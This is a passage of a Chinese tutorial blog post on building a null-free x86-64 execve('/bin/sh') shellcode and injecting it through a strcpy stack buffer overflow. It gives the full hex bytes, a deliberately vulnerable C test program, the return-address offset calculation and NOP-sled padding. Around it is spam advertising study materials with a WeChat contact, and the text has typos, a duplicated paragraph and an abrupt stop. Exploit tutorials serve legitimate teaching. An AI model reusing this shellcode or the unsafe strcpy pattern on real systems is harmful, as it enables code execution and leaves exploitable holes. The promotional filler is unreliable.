IOT设备shellcode，掌握了这些网络安全高级工程师必备知识

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

我们在前一篇文章里构造了一个shellcode，现在我们根据问题来再次修改这个shellcode，令它可以适应缓冲区输入的条件。

上面这段代码里，有两个地方出现了0x0， 如果用作缓冲区输入，则会造成输入提前返回，shellcode植入失败。我们可以将有ox0的代码用其他指令代替

我们可以将有ox0的代码用其他指令代替

首先，我们用指令： xorq %rax, %rax
这条指令可以把rax寄存器通过异或运算置0
然后0x0的地方就可以用%rax代替了。
把0x20改为0x16，这个没关紧要，是栈空间的大小，shellcode中是用来保存'/bin/sh'这个字符串用。

下面是修改后的代码：

将代码编译后用objdump取出十六制编码如下：

\xeb\x28\x59\x55\x48\x89\xe5\x48
\x83\xec\x16\x48\x89\x4d\xf0\x48
\x31\xc0\x48\x89\x45\xf8\x48\x89
\xc2\x48\x8d\x75\xf0\x48\x8b\x7d
\xf0\x48\xc7\xc0\x3b\x00\x00\x00
\x0f\x05\xe8\xd3\xff\xff\xff\x2f
\x62\x69\x6e\x2f\x73\x68

4. 测试实验

简单的修改了shodecode后，我们用下面的c代码生成的程序进行缓冲区溢出测试。

#include <stdio.h>
#include <string.h>

#define BUFSIZE 64

int main(int argc, char *argv[])
{
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    printf("Buf: %p\n", &buf);
    return 0;
}

这段代码为我们解决了前面所提到的两大问题，就是

1. 缓冲区足够放入我们的shellcode,我们用printf将shellcode植入的地址打印出来，实际的入侵中，不会出现这些便利。
2. buf处于main的栈基上第一个变量，我们很容易计算出buf离main设定的返回地址的距离：计算方法很简单， BUFSIZE+8的地址里就是main保存返回地址的地方。

现在我们要做的事情是，令buf的地址覆盖main的返回地址（下面称它为ret），我们已经知道buf到ret的长度是BUFSIZE（64）+8，即是72byte。

下面我们来计算一下shellcode的大小：

我们的shellcode共53byte，那么我们还需要添加19byte(72-53=19)其他内存才能将缓冲区溢出ret地址处。

那么我添加一些什么内容呢？ 这内容可不是随随便便都可以的。

程序设计里有一个操作叫NOP，它是no operation的简写，就是什么也不做，简直天生是为缓冲区溢出而设计的。
添加内容是加在shellcode的头还是尾呢？

这也是有考究的，将NOP加在shellcode的头，能够增加注入的机率，原因是什么呢？

buf的地址因每次程序的启动而改变，所以很难精准地获取到，但它终是在一个范围内变动，我们只要将ret落在buf地址的变动范围内，最理想就是落在shellcode的起始地址里，比较理想的是落到NOP中，通过NOP的移动，执行shellcode。
不过由于是测试程序，我们已经知道了注入的确切地址，一切都好办起来。

NOP写成指令就是0x90， 下面我们用0x90填充shellcode头部，让它达到72byte的长度。

好了，下面我们编译写好的C测试程序：

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

8 （备注网络安全）**
[外链图片转存中…(img-TT5h6tGQ-1713332271833)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！